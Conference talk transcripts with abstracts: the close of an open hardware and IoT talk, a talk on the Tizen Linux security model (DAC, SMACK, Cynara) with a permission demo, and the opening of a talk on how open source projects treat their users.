like PCB design tools? Oh, okay, somebody's done hardware design. But you know, everything that we do and everything that we touch these days is going to be used in ways that we're never going to understand or that we're never going to predict, which leads to two obvious statements. The first is, stop believing that you know what your users are going to do with your software and start listening to them. Because they're going to go and do things that make no sense to you. And they're going to ask for features that seem absolutely ludicrous. But it may just be that your tool is less bad than everything else they can use. And that's why they're trying to solve their own problems with it. And two, just be open to the possibility that, oh gosh darn it. And again, the magic of Linux and presentations, we'll see if that didn't come back. Because if things are open, we at least have the power to fix things. Because I'm sure nobody in this room has never run into a bug on a piece of software that they're using and immediately gone, screamed bloody murder, written a patch and submitted it. No one, right? No one? Good. Because I'm sure I've received several of those at some point. But if we're doing this in the open and we're doing this in hardware and we're doing this in software, we actually have the chance to fix things. Which means that all of those weird comments I had about IoT devices earlier, even if they're not fixable when the device comes out, if we have the opportunity to go and fix them later, this means that we as an entire society are safer and better off. And again, everything is going to get used in ways that you've never even remotely thought of. This is a conference badge, an electronic conference badge that was from a security conference two years ago. At the conference, someone turned it into a quadcopter. And honest to God, it flew. There's video on YouTube of it flying. And I can't... And I... Honestly, while I was doing this presentation, I could not think of a better example of people who are going to use things in ways that you would never even remotely thought of. This is a conference badge that has a bunch of blinking LEDs and some touch pad areas and some through hole pins that you can attach more things to it. And what did they do? They made a quadcopter and they flew it. And this... But I wanted people to start thinking about not what they're trying to do, but what their devices or their software could be used for. You know, yeah, don't ignore your major focus, but accept that the world is changing, it will always be changing, and people are going to do things in ways that you could have never expected. And I'm running slightly fast, so hopefully you guys have a lot of questions, and not about the flaming octopus with a replica of canine sitting next to it. Well, you can ask questions about it too. I will happily answer them because I built the canine. I did not build the giant flaming octopus. So questions, comments? That photograph was taken at the San Francisco Maker Faire. I believe three years ago. Two years ago. Two and a half years ago. Where do you get one? No, I'm not going to answer him. Canine, you can build the octopus. You have to go to San Francisco. Yeah, okay, so the question is, I'm going to repeat that. How does open hardware save us from the security, or the lack of security that may be coming out with existing devices? So depending on how this all works, it can't. Because a lot of companies are not going to open source their designs. They're not going to give you the ability to do anything with their designs. And this is kind of why I pointed out the WRT54GL, is because Lynxus never expected anybody to go and start modifying the firmware on the device. And yet people like us in this room were dedicated enough to go, there's Linux in this thing. I want to be able to control it. I need to be able to change it. And they went and they opened the device and they started figuring this out. Open hardware makes this easier because at least at some point you can publish all of this and you can save everybody in this room an absolute ton of time and effort, reverse engineering what's already been made. And I'm not saying that when a product comes out, it has to be immediately open source hardware. Maybe you run on a cycle that every two or three years as a device literally falls out of favor, out of use, you open source the design. Because then at that point, the poor gentleman who's got the Android 2.0 something phone, he could at least try, if he's got open specs to every piece of that hardware, he could actually try and get Marshmallow running on the device. But in all likelihood, because the device has been closed, the manufacturer doesn't want to support it anymore and probably half the people who worked on that particular platform are gone from the company. There's no mind share left to even remotely go and work on that device. So while I'm making an advocacy play here for open hardware because it gives everybody a chance maybe not necessarily right at the beginning, but eventually to be able to go in and modify and change things that that's beneficial. But if the company starts from a point of open hardware, this actually encourages them to come back and give it back to the open hardware world. There are companies that are taking, and I can speak to this, that are taking the minnow board and they're putting it into products right now, and they're changing things about the board, but they're also giving those changes back. I mean, they're kind of required to because of our licensing, because we're CC by SA, so that magical SA bit means that they have to give it back, kind of like the GPL. But these are companies that are still making money on product. They're manufacturing things, and yet just because anybody can take this and make it themselves, these companies are still making money, they're still seeing a profit there. So this kind of starts putting a nail in the coffin of, oh, well, if we open this up, we'll never make money. So I know that's kind of a roundabout way to answer your question, but it's... Okay, so I'm going to paraphrase this slightly. What is my understanding of open hardware with respect to the chips themselves and whether the chips or whether I would consider chips that may have open data sheets that you can go and look at to be open or not? Is that kind of the direction? Because you're talking about, is there even the point of, is it better to go down the FPGA route where you may control more of the hardware or at least the hardware design? So I actually follow the open source hardware associations model pretty closely from my personal belief. And generally speaking, I see open hardware as something that I can go and I can modify and I can change on my own, which is kind of what the GPL says about software anyway. But that doesn't necessarily mean that things like the atom chip that's on the minnow board. Yes, most of the specs for that particular chip are open, they're known, but things like, frankly, the microcode is not. Does that make the Intel chip that's used on it not suitable for open hardware? That ends up in a mostly religious argument over whether you believe that any closed piece means that you can't, or closes the entire design or not. And I would argue it does not because frankly building, I've got an open hardware design and I can pick and choose what pieces I put on there. That also means that I have the ability to choose what pieces may or may not work for me. So let's say that a transistor doesn't have an open enough data sheet for my purposes. I can at least have the opportunity or the possibility of going and finding another one that may have a more open data sheet. Now, admittedly, it's a transistor, there's three pieces to it. It's kind of hard to not understand what it is, but you can scale this to any piece of the design. Does that mean that you're going to be able to find everything that would work for you? Maybe, maybe not. It's a tough call. Oh, no. No, I would absolutely include things like FPGAs in the open hardware movement. I mean, they're just another piece that may or may not be on your design. You could replace the entire CPU on a lot of the open hardware boards now with an FPGA and then you control the entire, I'm going to put in quotes, the SOC itself. But I'm not saying that an FPGA is exclusive to open hardware and I'm not saying that the pre-baked ICs are exclusive. I mean, everything is in that space. I think asking for anti-devices that don't call home is like asking for use papers without commercial. But you save them with your money and watch some of your data and I think it's a difficult to ask for. I agree. And again, this kind of comes back to some of my commentary about the normal user base. Well, I would like my devices really desperately not to call home. There's a lot of people who, I mean, I have multiple VLANs in my home network. I'm really weird though and I accept that I'm like, normal people are over there and I'm somewhere in the next county over in comparison to how my network is set up. And I agree. I would like the option to really tell these companies I really don't want to call home. Really I'm going to go live in my own little microcosm. I am the outlier in this case. I am not the normal case. I am not the normal situation. But it would be awfully nice if I had more direct access over the software stack or even the hardware stack that exists in these devices that I could go and disable that, modify it or just write my own IP stack for my cameras, for instance. Would you say, all this much for a device? Personally, I would pay substantially more. But as far as I can tell in a lot of cases, these options don't even exist. So at this point, my choice is I can't get the feature I actually want, which means I'm going to go and pay the cheapest amount that I can to accomplish my goals and then take a giant band hammer at my firewall and turn off their ability to go out to the internet. Yes, that screws up some functionality. Lights. Oh, yes, I absolutely missed. I don't know how I didn't put an internet-connected light bulb up there. And yes, I completely forgot to add those. If you really want to see some of the most interesting hacks in the world, go look up the hacks for the internet-connected light bulbs. Those things are some of the most redonkulously badly-goed devices in the world. But they're really cool. You could have blinking lights nationwide. International-wide. Worldwide. Yeah. Sadly, I think that there may be enough infected light bulbs out there that that... That could actually be done at this point. Anyone else? Questions, comments? I mean, I'll be around. So if you've got anything more specific you want to chat with me about, by all means. Otherwise, I will give you back the, I believe, like three minutes or five minutes of your day. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
|
We now live in a golden age where computational power has gotten so cheap, and so low energy that computers are now entering into everything. We now have devices that can sit on your wrist for days alerting you to dynamic events, keep track of your motion and steps, connect to the wireless networks and report all this data, as well as bluetooth enabled pregnancy tests. Lets explore this new world we are entering in both it's glory and it's bizzare, and realizing just exactly how much power we have both for good, and evil and how being open about things, hardware and software, can help us all.
|
10.5446/32439 (DOI)
|
Okay, shall we start? Welcome everybody. My name is Alexander Zdib. I come from Poland, but currently I'm based in Switzerland. I'm going to tell you about modern security model for Linux operating systems. Why you might be interested in this. Well, this particular model is meant for embedded systems like smartphones, smartwatches, smart TVs and so on. And it's probably unlikely that you will have to design such kind of system in the nearest future because there are already many of them like Android, iOS, Windows, Tizen even if you haven't heard of it before. But if you were yesterday on John Holley's presentation about IoT devices, there's going to be a lot of them, these IoT devices. And each of them is going to run on some system, probably a dedicated one, but maybe not. And they will really need some security till the year 2020. There's going to be 10 million of us developers focused strictly on IoT devices. So there will be a lot of work on these devices and these devices will need to be secure. And I'm going to present a choice for security framework you can use on these devices if you haven't designed or developed a system for such devices. Well, what I'm going to tell you about. First of all, about security considerations, security requirements of embedded devices. How are these requirements different from, for example, desktop computers or servers? Why is it important? Next, what is the mission to accomplish in order to have this security in place and working? Next, we're going to focus on some technical details, implementations and so on. At the end, we have some short summary and if time allows, short Q&A sessions. So what about these security requirements or why we need security on embedded devices? There are a lot of IoT and other embedded devices right now. And the pictures above are just pretty usual right now. We use more and more of embedded devices and we store more and more private data on them. And these ones like smartphones, smartwatches, tablets, TVs are probably known to store such kind of data. But there are more. Yesterday, you could see that there are thermostats, thermometers, even pregnancy tests with connectivity like John yesterday showed. And sometimes we are not even aware that these devices are surrounding us and that they gather and store and share information about us, about our environment. However, there is some data on them, flying between them and it needs to be secure. So maybe some simple example. You can see two similar pictures, one taken on Ubuntu, the second taken on Android. This is screen showing installation of software on corresponding devices. What's the difference? I mean, both have name of the application, some descriptions, some nice screenshots. But what's the difference between desktop computer like Ubuntu and embedded mobile device like Android in this case? Well, when you try to actually install the application, in first example, you are presented with a password prompt to authenticate and to... So the system knows that you allow to install and to use this application. On the second picture, there's more. There are privileges that the application will be using. And that's the main difference. Let's go further. So Ubuntu in this case is using what I call classic security approach. I mean, installed and run application acts on behalf of the user, on behalf of us to the full extent. The application once run can do whatever we would do, whatever we could do while sitting at the terminal with our keyboard, with our mouse, and so on. On the Android, for example, there's something different. The application, of course, also acts on our behalf, but not to the full extent. It was limited to the very specific actions it can do. So what's about this operating system run on desktop and servers, maybe, and to compare them to the mobile or embedded devices, IoT devices, for example? So the operating system isn't just a piece of software that consumes space on our disks and hocks our CPUs. It governs some helpful services, some precious resources, and it helps us in using it. Of course, there are many resources and services like this one presented here, for example, email, camera, networking. There's not even a point in distinguishing them to services and resources. They may provide some services and have some resources at the same time. It doesn't matter. They live in our operating system and serve us in some way. But the real point here is that with these services and resources, we, or our applications, can do some specific things, can do some specific actions. Like for example, in email, you can read, write emails, you can preview your contacts, you can use camera for taking photos, or maybe this very same application also allows you to browse, already taken photos, and so on. What's the real point here is that with these services and resources, there are some actions connected, and these actions are further connected with privileges. I mean, if application is going to use, for example, email service, you could, you should be able to tell that it may read and write emails, but maybe couldn't preview all of your contacts and so on. But of course, these services and these resources are not only for you. I mean, who's going to use Telnet to read emails or write emails? You need some applications in your operating system, and they are really helpful. You can use your clients, browsers, games, whatever. And in the classic approach to security, like in presented Ubuntu, but it doesn't, it isn't limited to Ubuntu, it's rather a class of systems like desktop or servers. All these applications once installed have all your privileges. They can act on your behalf. So all of these applications you install have the same rights like you, to camera, internet, location services, contacts, and so on. It's not the point to disallow the applications to do so, but there's a point in limiting this access because it's probably a good thing so maps have access to location services. Maybe even camera could have this access to geotax, the taken photos, but probably calculator or games shouldn't have access to camera or contacts. So what we need is access control to these services and resources. And what do we need to do so? Well, we need to separate things inside the operating systems. First we need to separate users to tell them apart. This one user can access location services, the other one doesn't, and we need to distinguish to tell apart the applications. Like maps have access to location services, but games do not. And the first constraint, I mean separation of users is already there in Linux systems. And the separation of applications is whole larger and more complicated complex, and the rest of the presentation today is about this mainly. But the solution to this problem of separating users and applications is already there. It's implemented. I'm one of the developers who implemented it. And I'm going to present it to you. This is all of stuff I'm going to present today is open source, so every one of you can take this, try this, and implement this in your setups. It doesn't have... Can you speak a little bit louder? Oh, sorry. I will try. Okay. So every one of you can take this and implement, apply to new systems, existing systems, and it's, as you will hopefully see in the demo I'm going to present, it's not only limited to embedded devices, but we can go beyond this. That will come. So the security model I'm presenting was originally, initially developed for Tizen operating system. It's a plain Linux distribution. It's meant mainly for embedded and mobile devices. It's open source. It's already shipped on many devices like smartwatches, smartphones, smart TVs. But there are more of them. I mean more of products which are using some parts of this security models. Maybe you have something, sometimes on this project there are more, and these are just examples of usage. So this new security model consists of three pillars. Discretionary access control, Linux security models, in this case, smart and a new one, user space-based scenario. I'm going to go through all of them. First is DAG. You probably heard about this. Even if you don't heard of this, you are really using it every day. It's just plain old security model for present in Unix for like 40 years. You know the commands like change owner, change mode and so on, and this is it. It's used to separate users and their resources. You probably all know how to allow access to your files on Linux systems to some group or users, and this is it. You can have access type of reading, writing, executing and so on. Because really nothing much to say, it allows to fulfill the first restriction of separating user. And this is first pillar and it is used for this. The second is SMUG. Who has ever heard of SMUG? Okay, some of you. Maybe as in Linux, it sounds more bells. Yeah, it's something like this. SMUG is one of the Linux security models. It allows to restrict access to the resources. But in different ways than DAAC does. In operating systems, you have some entities like processes or files maybe. And you can, thanks to SMUG, label them. For example, you have a file on the file system and you can give it a label in the example label two. And it's file on our disk. And there's a process, for example, which is labeled with label one. And we can have some rules which tell what actions the subject, for example, process, labeled somehow, can do on object labeled maybe differently. If they have the same label, then the access is unrestricted. But if the labels are different, there are rules which tell the subject with this label can read but not write the object labeled differently. And of course, many objects and many subjects may have this very same label. So for example, all files in one of the directories can be labeled with the same label. So the process with distinct rules can access all of them. And maybe other process without rules to access this files will not have this. There are some conventions of labeling objects and subjects in operating system. I mean, it depends on you, but the security model I'm presenting uses this convention. For example, there is label floor underscore really to label some with only system directories. There is label user to label files in directories of users and so on. But it is just a convention for simplicity and for ease of administration. This is the third pillar. They were in Linux for a long time. DAQ was in Linux for its very beginning and even longer in unix's. DAQ I believe was in Linux from 2008 and other Linux security models since the beginning of the century. But it is something new. First of all, it's not in kernel space like the former two. It's user space one and it's dedicated for the presented solution. How it works, I will explain in a moment. And this is it. For example, in DAQ you have access rights for the files. If the user or some group could read or write this file. In SMAC you had labels. This label subject with this label can read or write object with another label. Here it's different. For example, we have a service, say, it's location service like GPS and we have some application in operating system like maps. Maps connect to the location service and request the current location of the system, of user of the system. But how does the service know if this particular application can access location? Well, it doesn't. It could have some mapping, some database with the answer to this question. Yes, maps can have location. Calculator cannot. But it may work, but it will probably be static, just static mapping or database. And the second thing is that every service in the operating system would need similar mapping or database. Well, it's not a good solution. What I propose is Cynara. It's that kind of database I was just talking about. It knows all the answers for this kind of questions. Does this map allow to use location services? Is Facebook allowed to use contact lists and so on? Cynara is a database, really, but sophisticated one. It can store entries statically, like yes, Facebook has access to contact lists, but it may also compute these answers on the runtime with some extensions. For example, if you're familiar with iOS or newer Android systems, you could be presented with a pop-up asking if these applications at this time can have access to some service or some resource. And end-to-end, Cynara computes the answer and returns it to the service. And this answer is distinct, yes or not. So it knows if this particular request can be served or not. How does Cynara know all these answers? There are some same defaults built in the system. There are manifests of installed applications. If you're familiar with developing for Android operating systems, then you know what is manifest. It simply tells the operating system which privileges are going to be needed by these applications and user can accept them or not. There's private seminar. If you're familiar with newer Android systems, then you know that in the runtime after the application is installed, you can grant or deny some of the privileges. And this is it. Once you may accept Facebook to use your contact list, but the other day, it doesn't have to be so. And at the end, there's also administrator role who can alter all these choices. So how does it work in practice? I mean, how it's what in the last cycle of application, what actions are done? But first, there's another component of this solution. It's called security manager who is a main hub for all this information. It's also the Decade program. It is used in many different aspects, in many different steps of lifecycle of the applications. For example, it takes parts in installing and launching applications. It manages different policies and rules in the systems. It's a hub where administrator or users can do their work to manage the rules in the operating system. So first step in the lifecycle of the application is, of course, installation of this particular application. There are files unpacked, but it's really nothing interesting. The more interesting thing is after putting the files on the file system, we grant access with DAQ. For example, we apply access rules who can read the files. Next, we label them with SMAC labels, which means we tell what processes can access files, what processes can access other processes, and so on. Next, the application is run. The main step in this launching process is applying so-called security context. Application in this security model has to have this security context which contains not only SMAC label, the process of the application runs with. So we can use these SMAC rules to allow accesses between processes and files, for example, but also groups it runs with. It's also important because we can have accesses to files and so on this device, this particular device. So how does it work in practice? As I told you before, on the simple example, there is this GPS service. It probably just had requests from some kind of application, for example, in this example maps to have to read the location. And as I told you before, it needs to ask Cynara if this access is granted. So what's there? What really happens? First of all, as I told you in this mission of separation, we are able to distinguish users and processes. So the GPS service in this particular example can tell what user is running this maps application and what this maps application really is. I mean, how is it different from a calculator application? So it has UID of the user running these maps and it has SMAC label of this maps application. It's worth nothing that all application of this same kind, I mean, from this same executable are run with the same SMAC label. Even if they run with different UIDs, for example, Susan and Bob, Susan's maps has label, for example, maps and Bob's maps application, if it's the same application, runs with the very same SMAC label. The GPS service knows this credentials, UID of the user requesting and the SMAC label of the application. And it forwards it to Cynara with the request, with the question if this couple, this pair of so-called client in this case, it's label of the application and this particular user can have access to privilege. In this example, it's location privilege. Cynara is calculating the answer. It may come directly from that database. It may be calculated, computed by external plugins like pop-up, like maybe contacting some external service, even maybe Windows domain, whatever. And GPS service gets the answer right back and it's distinct. It knows it's yes or not. Grant access or deny access. And hopefully we can show this on a demo. I prepared the demo on, I don't remember, it's Ubuntu or Fedora. It's not embedded system, definitely. But I just wanted to show you that you are not limited to the embedded mobile devices. So here we are with two applications installed on the operating system. One is contacts and one is some other application, evil calculator. What to notice on this first screen is that as I told you at the very beginning, there are these privileges, like in Android or like in iOS, for example. And here we have this information that contacts application have read access to contacts denied and also editing contacts is also denied. And we go a little further. We run this contacts application. And as you can see, contacts could not be fetched from contacts book, which is a service in this example. It could be plain file, like database, but whatever. We know that the access to reading or editing is denied, so this application could not have this access. Next, we change the permissions in real time. I mean, in live system. And this time, we can access the contacts. Now we try to edit contacts. As you can see, the access for editing is denied. So when we try to save, we have permission denied for this action. Editing is editing as well, so we can't. Now we change permission to ask user. So every time some application will try to edit contacts, we will be presented with a pop-up. Now we save this particular edit, and we are presented with prompt to allow this or not. If we deny, then we again have this permission denied. And if you allow, it's done, we could save this contact. What's more, this application was legitimate. I mean, we installed it. It requested in the manifest that it will be using contacts in this particular way. I mean, it requested that it will read contacts and edit contacts, and we have possibility to change these permissions, to alter these permissions, even in live. But there's also another application. It's not so legitimate, but somehow it is present in our operating system. Maybe it's just a random application we downloaded from Internet, and it didn't request any privileges, but let's see what will happen. So we downloaded this application. It seems to be legitimate. It does what it does. It's a calculator, but it has a hidden function. That's why it's evil. It tries to read our contacts. It wasn't supposed to do so. But with plain old classic security approach, there is nothing to stop this application from accessing the resources from our system or access services on our operating system. When we use this security model I'm presenting, we can know. We can know that this application, which is evil, wants to do something that it's not supposed to do. And we, of course, deny this action. But what if we allowed? Yes, it just read our contacts. And I believe this is it for the demo. Hopefully you now get the idea. Just another implementation detail. This contact service was a service. In this example, it served on Dibas IPC, but it doesn't have to be Dibas. It could be Unix, Socket, it could be whatever. But it was IPC Dibas in this particular example. Sometimes we have some resources that we don't want to be governed by a service. For example, we want to have raw access to the camera device on our system, just because it is faster. We can do so as well within this security model. And this is how we use groups. We apply a group, for example, camera users to the device that is device of our camera, of our microphone, or whatever. And when the application, in this example, camera is launched, we apply this group for this application. We do not apply this group like in classic approach to the user, because if user Bob or Susan was in camera users group, all of their application would have access to this device. But we don't want to. We want to distinguish that camera application has this access and calculator doesn't. So we do not put user in the group, but we put distinct applications of this user. It's done in lunchtime. And it works just like I explained. Okay, that would be it. There are some bonuses. First of all, you probably noticed that when you have some service, like in the examples here, contact service or GPS service, it has to have some code to contact Cenara, to request Cenara, in order to know which requests should be served or not. This is true. The services need some modifications, but they don't have to. They don't have to. If the services are using Dbass, then it's already done. I mean, we have a patch for Dbass, so we can intercept messages on this bus, and it's transparent for both service and client. They don't even have to know of existence of the security model of Cenara and so on. You just write config files that some particular service, the methods on Dbass are protected with some kind of access write, and that's it. The second bonus is NetHel. It allows us to configure the very same access control for networking. I mean, that this application can access network resources, the other doesn't. You can configure it on different access for different hosts, for different protocols, and so on. The third bonus is nice lot. You can audit all this stuff. You can follow the requests. You can follow the accesses. You can follow the answers for this request in terms of what this request allowed or denied, and so on. This is important, especially on the beginning of work with this security model, because you have many services and applications, and sometimes it's hard to configure it properly from the very beginning, and this tool is helping you with it. Okay. Hopefully, I showed you the difference, the main difference between a classic approach to security and the one I'm proposing. Hopefully, I showed you that this classic mechanism is not enough in modern world with more and more applications from different sources, like different kinds of application stores, and so on, and that's it. If you have any questions, I think we have some time. Yeah? Okay. At this stage of development, could your software also fake an access for the application? Can you explain more? What do you mean by faking? If you have an application that is evil, but the user wants this application. For example, you have Facebook, and if you install Facebook, they capture all your contacts at the installation process, and afterwards, you can block them from your contacts, but at the installation, it is mandatory, you gave them access to your contacts, so they are gone. I have to, as the user wants Facebook to run on his device, and if it's not run properly, he will rip off your extension, your security extension, to get this application. Do you understand what I mean? You mean that if at installation time, I grant the application rights to read my contacts? No, no, no. For security reasons, you have to do a fake in direction of that application. You have to fake that your contacts are empty, or there are only a bulshit in it, and gave them to Facebook, so they capture nonsense, but you can install that application, and afterwards, you can block the contents, as is the contact contents for the application, and Facebook is fine with this. Okay, now I get it. First, you don't have to do. This approach was taken several years ago by the Cyanogen Mod project, and before Android has this newer security model, which allowed in runtime to alter the privileges. But you don't have to do this, this way, because when you install application and the privilege is privacy-oriented, like contacts, like location, and so on, it's configured by default to ask user on the first usage, like in newer versions of Android. So of course, the application, Facebook in your example, in manifest, requests access to contacts, but it won't get it before first prompting user if they want to. Yeah, I understand, but the user wants that application, and if he has to decide, will they get my contacts or not, and you make a pop-up, and he can install with a granted, and he cannot install if he says no, so he will say yes, and live with that. Okay, but first of all, the application will be installed anyways. So I mean, you accept the requested privileges, but they won't be granted before first user, truly. So when this Facebook application runs for the first time, and only then it accesses the contacts. At this time, you can decide, do I accept it or not. But returning nonsense contacts is on different layer, it would need to be implemented in this contacts service, for example. This framework doesn't... Yeah, but you said you have to update or implement that in your services, so why doesn't we implement that too? Yeah, we could implement it this way, but we don't think it's really needed. I mean, this pop-up is only one of the extensions to this security model. I mean, there is a plugin which shows pop-up, allow or deny, but you could implement your own extension, which presents pop-up, allow, deny, return, nonsense. It would be up to you what happens when user chooses the third option. But we... This framework is very generic. We run it on Tizen smartphones, for example, smart TVs with Tizen. I just showed you it on Fedora. If we wanted to implement... I mean, we don't know what services exist on a system. It's generic. It just grants accesses or not. It doesn't know about what services are on the system. What do these services do? So implementing such things like return, nonsense as contacts is beyond this project's... Yeah. Has it been run on Ubuntu Touch, for example, yet? No. I run it on plain Ubuntu, like the desktop, and it works okay. I think that there are no restrictions on running it on Ubuntu Touch. You just have to implement, for example, this pop-up extension. I mean, this was just a quick example I hacked in one evening just to show you on demo. It was in Qt. If you implemented it in Toolkit used on Ubuntu Touch, it would work. Great. Thank you. Okay. How does it technically work? So if a program wants to open an address book, which is in some kind of file, does it somehow intercept system calls or how does it prevent a program from bypassing the... Okay. If address book was a file on the file system, we would apply a group to this file, for example, contacts users, and only users in this group would have access for this file. And also, only applications which are in this group would have access to this file. So in the lunchtime of the application here, you have applying groups for the process. So if this database with contacts has group contacts users, then this run application, this lunch application would need to have to be in this group to access this file. Does it not... What happens with network connection? What do you say? When you want to open a network socket, this usually doesn't depend on any kind of groups in Linux. Yeah. This is done by the special module. It's never... It's intercepting packets. I don't remember how this technique is called, but it's just like IP tables which decide which packets can go through and which cannot. It's more like some kind of simple firewall, but it not only checks origin and destination of the packets, but also it knows about which user and which applications created this packet or which user and which application is going to get this packet. Thanks. Okay. As far as I'm concerned, you just said that you just hacked up the demo, the privacy manager. I think it's actually a pretty nice solution to have something like that on a desktop system as well. Okay. So are you at any stage planning to actually release and work on a privacy manager like that in the future, or was it just for the demo and someone else is going to have to do that? Okay. First of all, no, I'm not going to continue on this because it would really need to... It's going to need much, much work from the... Not only administrator of the particular installation, but from managers of distributions. I mean, the contact service presented here run on debas. So if services run on debas, we can just patch debas in one instance, when in one distribution and we're okay. But many services don't work on debas. They open their own sockets, they share to their memory, they share their files. They would need to be modified in some way. Of course, Cynara provides some helper libraries. So you can use these libraries to modify the services without much effort. I mean, you just link with this library and you have a socket from the client. You just give this library the socket and it makes the work. So it's not much effort to modify services, but there's a lot of them. For this security model to be effective, you have to modify all the resources or the services. I showed it on a desktop system just to show you it's possible. But if it's feasible, I don't think so. So it's better suited for mobile devices. Because there's one manufacturer who decides what kinds of applications are shipped by default and then, of course, they can modify those few applications and then the whole system itself is, of course, built around this security model. Yes, of course. As I told in the beginning, this security model was meant for Tizen operating system. And I worked on this effort. I worked on Tizen and we could decide which way to go and we could even implement the needed modifications to the services. And there was, I mean, a limited number of these services. If you want to go to the wild and do it in Fedora, it's just too much work. Thanks. Hello. Hello. I have a question regarding the camera example that you have there. Which one? The one with the camera users. Right, this one. This one? Yeah. You activate some group, right, to access the camera. But what if you want to access the camera and also the GPS? So you activate another group or like if you have a process and it's running under one group so you cannot have process running under two groups. When the process is launched, it can run with arbitrary number of groups. So you can apply it camera groups, camera users groups, GPS users group and so on. It's arbitrary number. Just like user can be at the same time in different groups, the process as well. It can be in several groups at the same moment. Okay. Thank you. One last question, okay? Okay. Thank you. As far as I understood, Sarnar requires a patch D-Bus to operate in a secure manner. Yeah. I mean... Are these patches going to be integrated into D-Bus? Not really. I mean, Tizen is open source and you can download these patches from tizen.org. But we haven't done any effort yet to upstream these patches to D-Bus. But I mean, we take newer and newer versions of D-Bus and we backport these patches, but it's not really upstream and I don't think it will be in some near future. This concept is not so popular. I mean, this is one in several systems like Tizen, for example. Some parts of this model are run in different IoT-oriented distributions, but it's not so popular that it would be accepted in upstream D-Bus, I think. Not in near future. Okay, how does it differ from something like Polisikit? It doesn't differ much, but to be honest, we tried to use Polisikit instead of Tsunara. But Polisikit is something that is meant to run in GUI interfaces mainly. So even I don't want to say it was Polisikit was slow, but it was. If you want every single request for some services or resource in operating system to be, let's use this word, intercepted, interpreted and managed, it can't be slow. And Polisikit was too slow for us. So we implemented. I mean, Polisikit was okay. But I mean, 100 milliseconds is not much if you show pop-up every time. But if you do several hundreds of requests per second, it matters. Okay. And one last question for the concept illustrated in the slide. As you work something like a pseudo to supply additional groups to the process at startup of the process. Yeah, I mean, this launcher is a privileged process which can apply different security contexts, for example, groups. Okay. Thank you. Thank you. Okay. We're ready out of time. So thank you again for listening.
|
Security and privacy of information stored on embedded devices is gaining on importance. It turns out that security models designed for desktops and servers cannot be directly adopted in embedded devices. Moreover desktop systems themselves seem to lag behind, when it comes to accessing privilege-oriented resources like camera, microphone or address book. Aleksander will show how growing security requirements for operating systems are fulfilled with usage of existing Linux mechanisms, like MAC or DAC and new ones, like Cynara and Security Manager. You will have a chance to learn the complete security framework implemented in Tizen operating system and Linux Foundation's Automotive Grade Linux and get to know how well designed solution can provide security and privacy for whole system, relieving efforts of 3rd-party developers.
|
10.5446/32442 (DOI)
|
I'd like to introduce to you Leslie Horsen, who was responsible for making Google's summer of code great again. And especially responsible for Google code. After some time at Lestik, she now works for Red Hat and there is part of the send-off team. And she will talk about how open source projects handle their users, how they work with their users and how they can improve on making their users happy. So big round of applause for Leslie. Thank you so much for that introduction, Scotty. Hello everyone, thank you very much for coming. I'm honored to be back at Frostcon again this year. This is my second Frostcon and it will certainly not be the last. I'm here today to talk again, as Scotty said, about the way that open source projects interact with their users and why certain behaviors are extremely problematic and why they can contribute not only to a lack of user happiness, but I believe to a lack of adoption of open source. And I feel very strongly that this topic is important because I think that we are at a crucial time in the evolution of technology where people are aware enough of the implications of the choices that they make about what software they run and what tools they use and how those have a greater social impact and an impact on themselves and their freedoms. So when my dear friend Valerie, who is a teacher, a high school teacher, so students in their 11th year of high school, who are recent migrants from Haiti and the Dominican Republic and who inevitably every time I see her hands me her mobile phone and says, can you please make these notifications go away? They're horrifying me. And I discovered she hasn't done a software update in two years since I last saw her. When she calls me and says, Blondie, what is this open source stuff? Because I think we're being spied on and that's not good. Then I know we're at a critical time to be able to bring more users into the free and open source software fold and to help them understand why it's important that they use free and open source software. So unfortunately, I don't think that we do a very good job of welcoming people into the open source world. Although I have to admit, every time I come to FrostCon and have a talk to give that rants about how we don't treat people really well, I am reminded that this is probably the worst audience in the world to give these talks to because everyone in this community is so welcoming and so cool and is so invested in helping other people learn that I then am grateful that at least there's a video. So maybe this will be useful to folks who are not in this particular audience. So this talk is actually, hey, slides, why do you hate me? All right, you just, there's so much hatred. La, la, la. Do you want to do a thing? You do want to do a thing. This is excellent. So this talk actually started as a very private rant between myself and my dear friend Donna Benjamin. And this is actually a 10-year long sort of bubbling thing inside of ourselves where Donna and I would get together at various conferences and have the, I am your user, why do you hate me rant? So Donna Benjamin is not a developer. Donna Benjamin is a content strategist. She is a community organizer. She's been responsible for the adoption of open source software across a number of governmental departments in Australia, in her province of Victoria. She lives in Melbourne and works extensively there with the Department of Education. She's migrated them off of proprietary CMS onto Drupal. She's helped them to get courses on open source software into computer science and IT curriculums in universities there. And so obviously, very accomplished woman has been involved in the open source community for many decades. I'm also not a developer. I'm not a lawyer. I'm one of those people who helps folks deal with their squishy human problems and also creates mentoring programs or mentorship opportunities to help get more people involved in open source development, be that programming, be that design, documentation, etc. So we were sitting together at a table and something happened that generated this epic rant. And when we got together 10 years later to finally give this talk, we sat down and both sheepishly looked at each other and said, do you remember why we started ranting about this? And she didn't remember either. So there was some whiskey involved, mistakes were made, but at least this rant came out of it. So effectively, we would consistently, after that, when we met up, we would look at each other and we would say, I am your user. Why do you hate me? And what we were referring to was this, to us, very odd pattern of behavior amongst our friends and colleagues who were open source developers who just seemed to have this deep contempt for the people who were using their software. I mean, for a long time, once upon a time, I was dating a systems administrator and every day when he would be done with work, he would come down home, flop down in his easy chair and say, users, every single day, these were the first words out of his mouth. And I couldn't figure out why there was this deep level of contempt. And obviously, there are many stupid questions to be asked and I think I've asked a few of them, but it just seemed to me to be so outsized. And I was frequently, along with Donna, in conversations where these kinds of rants against stupid users and their stupid ideas and their stupid bug reports and why don't they just figure out, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah. And we would kind of sit there sheepishly, very quietly. And then folks at the table would notice that we were being very quiet and they'd say, no, no, no, not you, we love you. You guys are great. But the people you're describing, the behaviors you're describing, like not a developer, not a, you know, not a maintainer of an open source project, these things applied to us. So we were thinking, we're your user too. Why do you hate us? Like why is this happening? And I think it starts off with our understanding of what a user is. So a user is somebody who just uses a computer network or service, right? Somebody who lacks the skill to be able to develop a particular system is a user of that system. Okay, fair enough. This is accurate. But I wonder about this particular part of the definition, without the technical expertise required to fully understand it. Does anybody here actually understand everything about how their computer works? Excellent, not a single hand has been raised. And there are no doubt many computing experts in this audience. The idea that our users are somehow lacking in intelligence and are not worthy of our respect because they do not fully understand the systems which they use is ridiculous. None of us actually understand fully how all of our technology works, which I think is actually a fairly scary proposition. So let's talk about some of the ways in which we display sad, sad behavior towards our users. I am personally a big Shakespeare fan and his son had, how do I love the, let me count the ways. So he is the 